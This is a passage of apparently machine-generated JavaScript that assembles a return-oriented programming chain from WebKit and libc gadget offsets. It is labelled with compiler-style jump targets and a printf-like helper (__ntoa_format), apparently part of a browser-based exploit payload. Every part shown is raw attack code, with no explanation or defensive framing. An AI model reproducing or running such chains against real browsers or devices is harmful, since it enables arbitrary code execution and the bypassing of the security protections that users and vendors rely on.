webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+208256, //L3534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3533:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3534:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3535:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3536:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+208400, //L3537+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+208392, //L3537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3537:
db([0, 0]); // 0x0
set_gadgets([
ropchain+208416, //L3537+24
ropchain+210360, //L3532
libc_base+764760, //pop rsi
ropchain+208456, //L3538
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3538:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3540:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+208576, //L3543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+208560, //L3541
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3541:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3543:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+208720, //L3546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+208688, //L3544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+208704, //L3545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3544:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3545:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3546:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+208800, //L3547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3547:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3549:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+208920, //L3552
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+208904, //L3550
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3550:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3552:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+209064, //L3555
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+209032, //L3553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+209048, //L3554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3553:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3554:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3555:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+209152, //L3557
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3556:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3557:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+209208, //L3558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3558:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3560:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+209288, //L3562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3562:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+209400, //L3563
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3563:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3565:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+209520, //L3568
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+209504, //L3566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3566:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3568:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+209664, //L3571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+209632, //L3569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+209648, //L3570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3569:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3570:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3571:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+209744, //L3572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3572:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3573:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L3574:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+209872, //L3576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+209856, //L3575
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3575:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3576:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+209952, //L3577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3577:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3579:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+210072, //L3582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+210056, //L3580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3580:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3582:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+210152, //L3584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+210184, //L3586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3584:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L3585:
ropchain+210312, //L3583
libc_base+144605 //pop rdi
]);
//L3586:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+210288, //L3588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+210304, //L3587
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3588:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3587:
db([0, 0]); // 0x0
//L3583:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+210376, //L3589
//L3532:
libc_base+782311, //pop rsp
ropchain+210392, //L3590
//L3589:
libc_base+782311, //pop rsp
ropchain+206592, //L3494
//L3590:
//L3488:
libc_base+764760, //pop rsi
ropchain+210432, //L3591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3591:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3593:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+210552, //L3596
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+210536, //L3594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3594:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3596:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+210664, //L3597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+210696, //L3599
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+210680, //L3598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3597:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3598:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3599:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+210800, //L3600
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+210816, //L3601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L3600:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3601:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+210936, //L3602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+210920, //L3603
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3603:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3602:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+211024, //L3605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+211008, //L3604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3604:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3605:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+211128, //L3606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+211144, //L3607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L3606:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3607:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+211264, //L3608
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+211248, //L3609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3609:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3608:
db([0, 0]); // 0x0
//__ntoa_format:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+211336, //L3611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L3611:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+211432, //L3612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+211464, //L3615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L3612:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3614:
db([96, 0]); // 0x60
set_gadget(webkit_base+568675,); //pop r8
//L3615:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+211568, //L3618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+211552, //L3616
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3616:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3618:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+211744, //L3621
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+211760, //L3622
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+211712, //L3619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+211728, //L3620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3619:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3620:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3621:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3622:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+211856, //L3624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+211840, //L3623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3623:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3624:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3625:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3626:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L3627:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+212056, //L3629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3629:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+212112, //L3630
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3630:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+212248, //L3634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+212232, //L3633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3632:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3633:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3634:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+212368, //L3637
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+212336, //L3635
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3635:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3636:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3637:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+212504, //L3639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+212520, //L3640
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+212488, //L3638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3638:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3639:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3640:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+212632, //L3642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+212680, //L3645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+212648, //L3643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3642:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3643:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3644:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3645:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+212792, //L3646+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+212784, //L3646
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3646:
db([0, 0]); // 0x0
set_gadgets([
ropchain+212808, //L3646+24
ropchain+230352, //L3641
libc_base+764760, //pop rsi
ropchain+212848, //L3647
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3647:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3649:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+212968, //L3652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+212952, //L3650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3650:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3652:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+213144, //L3655
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+213160, //L3656
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+213112, //L3653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+213128, //L3654
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3653:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3654:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3655:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3656:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+213320, //L3660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+213288, //L3658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+213304, //L3659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3657:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3658:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3659:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3660:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+213424, //L3663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+213456, //L3665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3662:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3663:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3664:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3665:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+213568, //L3666+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+213560, //L3666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3666:
db([0, 0]); // 0x0
set_gadgets([
ropchain+213584, //L3666+24
ropchain+214624, //L3661
libc_base+764760, //pop rsi
ropchain+213624, //L3667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3667:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3669:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+213744, //L3672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+213728, //L3670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3670:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3672:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+213920, //L3675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+213936, //L3676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+213888, //L3673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+213904, //L3674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3673:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3674:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3675:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3676:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+214032, //L3678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+214016, //L3677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3677:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3678:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3679:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3680:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3681:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
